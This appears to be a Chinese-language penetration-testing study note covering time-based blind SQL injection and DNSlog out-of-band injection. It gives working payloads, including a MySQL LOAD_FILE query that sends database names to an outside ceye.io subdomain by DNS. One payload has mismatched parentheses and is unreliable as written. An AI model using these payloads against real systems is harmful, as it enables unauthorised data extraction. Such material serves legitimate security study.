渗透测试 day4

时间盲注

原理：构造语句，通过页面响应的时长，来判断信息。

方法：构造逻辑语句，通过条件语句进行判断，为真则立即执行，否则延时执行

核心语法：

if(left(user(),1)='a',0,sleep(3));

 

 

 

 

Dnslog盲注

dnslog是用户访问网站过程中被dns服务记录的信息

原理： 通过布尔或时间盲注效率很低，需要发送很多的请求进行判断，很可能触发安全设备的防护，我们需要一种方式，减少请求，直接回显数据，这里就使用dnslog实现注入。

 

dnslog平台 ：http://ceye.io/

mysql LOAD_FILE函数可以发起请求：

SELECT LOAD_FILE(CONCAT('\\\\','test','.mysql.d1egqb.ceye.io\\abc'));

方法：

构造语句，利用load_file()函数发起请求，使用dnslog接受请求，获取数据

核心语法：

SELECT LOAD_FILE(CONCAT('\\\\',select database()),'.mysql.d1egqb.ceye.io\\abc'));

 

 

 

load_file()函数只能在windows操作系统上使用，linux操作系统不能使用